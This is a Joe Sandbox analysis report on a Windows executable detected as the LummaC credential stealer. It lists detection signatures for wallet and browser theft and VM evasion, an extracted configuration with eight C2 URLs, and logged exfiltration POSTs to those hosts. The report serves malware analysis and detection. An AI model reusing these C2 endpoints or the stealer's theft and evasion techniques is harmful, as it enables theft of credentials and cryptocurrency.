Edit tour

Windows Analysis Report
DEVM25.exe

Overview

General Information

Sample name:	DEVM25.exe
Analysis ID:	1638405
MD5:	9fe5481f315ba58f770036d3fd7e4df6
SHA1:	d1e2ef9941cd64464f072c6b8057dd2412b8dd6c
SHA256:	0c02329918aab4ea3d1cba93f48aa04ac154ce281562893ebd083806a01bc4e3
Tags:	exeLummaStealeruser-tcains1
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

DEVM25.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\DEVM25.exe" MD5: 9FE5481F315BA58F770036D3FD7E4DF6)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DEVM25.exe (PID: 1480 cmdline: "C:\Users\user\Desktop\DEVM25.exe" MD5: 9FE5481F315BA58F770036D3FD7E4DF6)

WerFault.exe (PID: 5420 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 404 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "a068784efd3cf9c207d81456a0f3b23a18e816269cf77f03cffc8e20"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1024350882.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2190447431.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000003.1024777986.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: DEVM25.exe PID: 1480	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DEVM25.exe PID: 1480	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.DEVM25.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.DEVM25.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T11:47:11.473766+0100	2028371	3	Unknown Traffic	192.168.2.9	49683	149.154.167.99	443	TCP
2025-03-14T11:47:12.499413+0100	2028371	3	Unknown Traffic	192.168.2.9	49684	104.21.80.1	443	TCP
2025-03-14T11:47:14.559453+0100	2028371	3	Unknown Traffic	192.168.2.9	49685	104.21.80.1	443	TCP
2025-03-14T11:47:15.954312+0100	2028371	3	Unknown Traffic	192.168.2.9	49687	104.21.80.1	443	TCP
2025-03-14T11:47:17.192519+0100	2028371	3	Unknown Traffic	192.168.2.9	49689	104.21.80.1	443	TCP
2025-03-14T11:47:19.444801+0100	2028371	3	Unknown Traffic	192.168.2.9	49691	104.21.80.1	443	TCP
2025-03-14T11:47:21.041675+0100	2028371	3	Unknown Traffic	192.168.2.9	49694	104.21.80.1	443	TCP
2025-03-14T11:47:22.745122+0100	2028371	3	Unknown Traffic	192.168.2.9	49695	104.21.80.1	443	TCP
2025-03-14T11:47:23.235684+0100	2028371	3	Unknown Traffic	192.168.2.9	49696	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DEVM25.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://menuedgarli.shop/AUIqn	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzS6y	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzSW	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/s	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzSY	Avira URL Cloud: Label: malware
Source: https://featureccus.shop/bdMAn	Avira URL Cloud: Label: malware
Source: menuedgarli.shop/AUIqn	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzSFB	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzSyb?	Avira URL Cloud: Label: malware
Source: https://jowinjoinery.icu/P	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzSAy	Avira URL Cloud: Label: malware
Source: https://featureccus.shop/bdMAn6	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top:443/aNzS4d	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "a068784efd3cf9c207d81456a0f3b23a18e816269cf77f03cffc8e20"}

Multi AV Scanner detection for submitted file

Source: DEVM25.exe	Virustotal: Detection: 73%			Perma Link
Source: DEVM25.exe	ReversingLabs: Detection: 76%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp	String decryptor: menuedgarli.shop/AUIqn
Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp	String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041E3E2 CryptUnprotectData,		2_2_0041E3E2
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_0041E3E2 CryptUnprotectData,		2_2_0041E3E2

Source: DEVM25.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.9:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49696 version: TLS 1.2

Source: DEVM25.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B8FCDE FindFirstFileExW,	0_2_00B8FCDE
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 0_2_00B8FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00B8FD8F
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B8FCDE FindFirstFileExW,	2_2_00B8FCDE
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 2_2_00B8FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00B8FD8F

Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F7D6D3F6h	2_2_0044E040
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+4F6B8E88h]	2_2_0044E330
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then jmp ecx	2_2_004484F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	2_2_0042FD50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+04h]	2_2_0042FD50
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	2_2_0044CD30
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx esi, byte ptr [ebx+ecx]	2_2_0040DDD8
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4F6B8E84h]	2_2_0044DE30
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov ebp, ebx	2_2_0044CE30
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0Ch]	2_2_00420F40
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]	2_2_00420F40
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+4C7A61F4h]	2_2_004447A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]	2_2_00433050
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov dword ptr [esp+04h], esi	2_2_0042281A
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2Ch]	2_2_00433050
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_004358F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	2_2_004318AB
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+28h]	2_2_0040C8B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then and edx, 80000000h	2_2_0040C8B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00441170
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0AF7CF10h]	2_2_0043697D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]	2_2_00449100
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_004289F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004289F0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0AF7CF10h]	2_2_00436983
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	2_2_0041B180
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx eax, ax	2_2_0040C1B0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CF91E6EAh	2_2_0041B260
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-00C2F826h]	2_2_0044A26D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], C446A772h	2_2_0041CA70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov dword ptr [esi+08h], edi	2_2_0041CA70
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00420A7D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ebx, bx	2_2_0042D23D
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then cmp word ptr [edi+esi+02h], 0000h	2_2_00427290
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov ebx, eax	2_2_00408B10
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-1BBE5BD8h]	2_2_00430320
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 744E5843h	2_2_00448BD0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then cmp dword ptr [esp], 00000000h	2_2_004463A1
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_0040A440
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_0040A440
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov edi, eax	2_2_0041D44B
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_00435C00
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then dec ebp	2_2_00435400
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+1Ch]	2_2_004124E6
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+4F6B8E88h]	2_2_0044E490
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then jmp eax	2_2_00410D09
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov edx, dword ptr [ebp+3Ch]	2_2_0044C510
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-1BBE5BD8h]	2_2_004305C7
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6CBE3A07h	2_2_0041C5F8
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then jmp dword ptr [00454728h]	2_2_00431595
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_0040C5A0
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-7601D31Ch]	2_2_004206D2
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov dword ptr [esi+08h], ecx	2_2_0041C6A8
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041C6A8
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00433F40
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov dword ptr [esi+10h], edx	2_2_0041EF55
Source: C:\Users\user\Desktop\DEVM25.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0043276D

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: menuedgarli.shop/AUIqn
Source: Malware configuration extractor	URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz

Source: global traffic

HTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49683 -> 149.154.167.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49685 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49687 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49694 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49691 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49696 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49689 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49695 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49684 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: mrodularmall.top
Source: global traffic	HTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=v26S4tXtW0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14915Host: mrodularmall.top
Source: global traffic	HTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8rnleC74sP3YDM0GB7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15071Host: mrodularmall.top
Source: global traffic	HTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=uWB6O025of0tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20557Host: mrodularmall.top
Source: global traffic	HTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=eH6UHssxL3ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2491Host: mrodularmall.top
Source: global traffic	HTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=eGbsHo3RbF53User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571314Host: mrodularmall.top
Source: global traffic	HTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: jowinjoinery.icu

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: menuedgarli.shop
Source: global traffic	DNS traffic detected: DNS query: featureccus.shop
Source: global traffic	DNS traffic detected: DNS query: mrodularmall.top
Source: global traffic	DNS traffic detected: DNS query: jowinjoinery.icu

Source: unknown

HTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: mrodularmall.top

Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: DEVM25.exe, 00000002.00000003.1000943293.000000000357D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: DEVM25.exe, 00000002.00000003.1002300071.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: DEVM25.exe, 00000002.00000003.1002300071.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/bdMAn
Source: DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://featureccus.shop/bdMAn6
Source: DEVM25.exe, 00000002.00000003.973003175.0000000003588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: DEVM25.exe, 00000002.00000003.1002300071.0000000003571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: DEVM25.exe, 00000002.00000003.1672573469.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672292234.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1672397247.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191965420.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/P
Source: DEVM25.exe, 00000002.00000003.1672397247.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000002.2191965420.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jowinjoinery.icu/bdWUa
Source: DEVM25.exe, 00000002.00000003.966232662.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://menuedgarli.shop/AUIqn
Source: DEVM25.exe, 00000002.00000003.1040674968.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, DEVM25.exe, 00000002.00000003.1048472786.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mrodularmall.top/
